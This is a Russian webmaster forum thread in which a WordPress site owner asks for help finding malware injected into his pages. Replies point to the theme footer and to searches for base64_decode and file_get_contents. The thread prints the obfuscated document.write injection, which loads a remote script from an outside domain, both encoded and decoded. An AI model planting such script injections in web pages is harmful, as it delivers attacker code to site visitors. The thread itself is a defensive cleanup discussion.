X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость (

| Вход | Регистрация )

Открыть тему
Тема закрыта
> Помогите найти вирус на сайте
ERSEO
ERSEO
Topic Starter сообщение 26.9.2013, 19:50; Ответить: ERSEO
Сообщение #1


Добрый день, суть проблемы:
Недавно почистил свой сайт от вирусов, и везде проверил - вроде нету, а сегодня заметил ссылку на сайте
http://reviewhoax.com/wp-includes/pomo/.backup/.script.js

В коде страницы я нашел только это:
находится в самом низу страницы (если смотреть в коде) на сайте 2013ege.ru
<div></div>
</body>
</html><script>
document.write(unescape('<script%20%73%72%63%3D%68%74%74%70%3A%2F%2F%72%65%76%69%65%77%68%6F%61%78%2E%63%6F%6D%2F%77%70%2D%69%6E%63%6C%75%64%65%73%2F%70%6F%6D%6F%2F%2E%62%61%63%6B%75%70%2F%2E%73%63%72%69%70%74%2E%6A%73%20%74%79%70%65%3D%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%3E%3C%2F%73%63%72%69%70%74%3E'));
</script>

Расшифровал и получил:
document.write(unescape('<script src=http://reviewhoax.com/wp-includes/pomo/.backup/.script.js type=text/javascript></script>'));

Вообщем я не знаю, где может находится этот код и как он может образовываться. И еще, нашел в коде файл
http://2013ege.ru/wp-content/themes/SinCrew/script.js

Помогите найти где может находится этот код, скрипт или хотя бы чем проверить.
Спасибо.


--------------------
Имеются инвайты в PROFITRAF - напишите в ЛС о ваших сайтах.
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
sdrc26
sdrc26
сообщение 26.9.2013, 20:40; Ответить: sdrc26
Сообщение #2


У вашего хостера есть антивирус на сервере?
Ищите в шаблоне WP в файле футер

напишите свой ICQ постараюсь помочь

Сообщение отредактировал sdrc26 - 26.9.2013, 20:45


--------------------
__________________AMSTERDAM__________________

ISPmgr Lite / Pro - 3 / 5.5 EUR в месяц или 22 / 40 EUR Вечная

P.S. Занимаюсь предоставлением услуг Хостинга с 2007-ого года
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Electric
Electric
сообщение 27.9.2013, 10:32; Ответить: Electric
Сообщение #3


Ищите base64_decode в шаблоне и дешифруйте.

Возможно подгружают извне, смотрите в шаблоне file_get_contents
Если сами не найдете - обращайтесь, будем лечить.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
BRONX
BRONX
сообщение 27.9.2013, 11:49; Ответить: BRONX
Сообщение #4


Само собой, с паблика взяли шаблон, если не понимаете в php / html смысла нет такую шару ставить, 80% что там будут как минимум ссылки на другие ресурсы, фреймы незаметные ведущие на какой нибудь левый сайт, все это пройденный этап.
Electric чуть выше правильно ответил

к стати удалите код, он с другого ресурса, вообще код ссылки с других ресурсов надо резать, допустимо только с проверенных ресурсов.

<script>
document.write(unescape('<script%20%73%72%63%3D%68%74%74%70%3A%2F%2F%72%65%76%69%65%77%68%6F%61%78%2E%63%6F%6D%2F%77%70%2D%69%6E%63%6C%75%64%65%73%2F%70%6F%6D%6F%2F%2E%62%61%63%6B%75%70%2F%2E%73%63%72%69%70%74%2E%6A%73%20%74%79%70%65%3D%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%3E%3C%2F%73%63%72%69%70%74%3E'));
</script>


Замечание модератора:
Эта тема была закрыта автоматически ввиду отсутствия активности в ней на протяжении 100+ дней.
Если Вы считаете ее актуальной и хотите оставить сообщение, то воспользуйтесь кнопкой
или обратитесь к любому из модераторов.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Горячая тема (нет новых ответов) Тема имеет прикрепленные файлыБыстрый и качественный обмен на сайте Baksman.org
Обмен Bitcoin, BTC-e, PM, Qiwi, Yandex money, Карты банк
52 Baksman 33586 Вчера, 5:02
автор: Baksman
Открытая тема (нет новых ответов) Боты могут делать пушподписки на моём сайте?
0 Megaspryt 430 17.4.2024, 23:29
автор: Megaspryt
Горячая тема (нет новых ответов) CryptoCloud — прием USDT, BTC, ETH, LTC на любом сайте
36 CryptoCLoud 10638 16.4.2024, 16:02
автор: CryptoCLoud
Горячая тема (нет новых ответов) Странный трафик на сайте длительное время
33 TABAK 8761 12.4.2024, 5:56
автор: Skyworker
Открытая тема (нет новых ответов) Через какой браузер и как можно найти в кэшэ браузера видео
10 Room 2293 23.3.2024, 7:41
автор: Room


 



RSS Текстовая версия Сейчас: 19.4.2024, 11:29
Дизайн